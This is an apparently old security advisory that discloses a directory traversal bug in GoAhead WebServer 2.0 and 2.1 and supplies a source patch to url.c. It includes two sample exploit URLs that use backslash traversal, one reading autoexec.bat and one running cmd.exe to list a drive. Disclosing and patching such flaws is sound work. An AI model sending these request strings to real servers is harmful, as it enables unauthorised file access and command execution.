Hello! We have found a bug in the GoAhead WebServer, v.2.0 and v.2.1. Attacker can get any file from the drive, where web-server was installed. try follow request http://www.somehost.com/..\..\..\..\..\..\autoexec.bat This vulnerability may allow an attacker to execute code with the privileges of the GoAhead ( Administrator? or root? ) http://www.somehost.com/cgi-bin/..\..\..\..\..\..\winnt\system32\cmd.exe?/c+ dir+c:\ Patch for this vulnerability: in file: url.c in function websUrlParse(...) int websUrlParse(char_t *url, char_t **pbuf, char_t **phost, char_t **ppath, char_t **pport, char_t **pquery, char_t **pproto, char_t **ptag, char_t **pext) { char_t *tok, *cp, *host, *path, *port, *proto, *tag, *query, *ext, *slash; char_t *last_delim, *hostbuf, *portbuf, *buf; int c, len, ulen; a_assert(url); a_assert(pbuf); ulen = gstrlen(url); /* * Deny directory traversal vulnerability */ while((slash = strchr(url, '\\')) != NULL) { *slash = '/'; } /* * We allocate enough to store separate hostname and port number fields. * As there are 3 strings in the one buffer, we need room for 3 null chars. * We allocate MAX_PORT_LEN char_t's for the port number. */ -- Sergey Nenashev <[EMAIL PROTECTED]> Yevgeny V.Yourkhov <[EMAIL PROTECTED]> Security Administrator Team
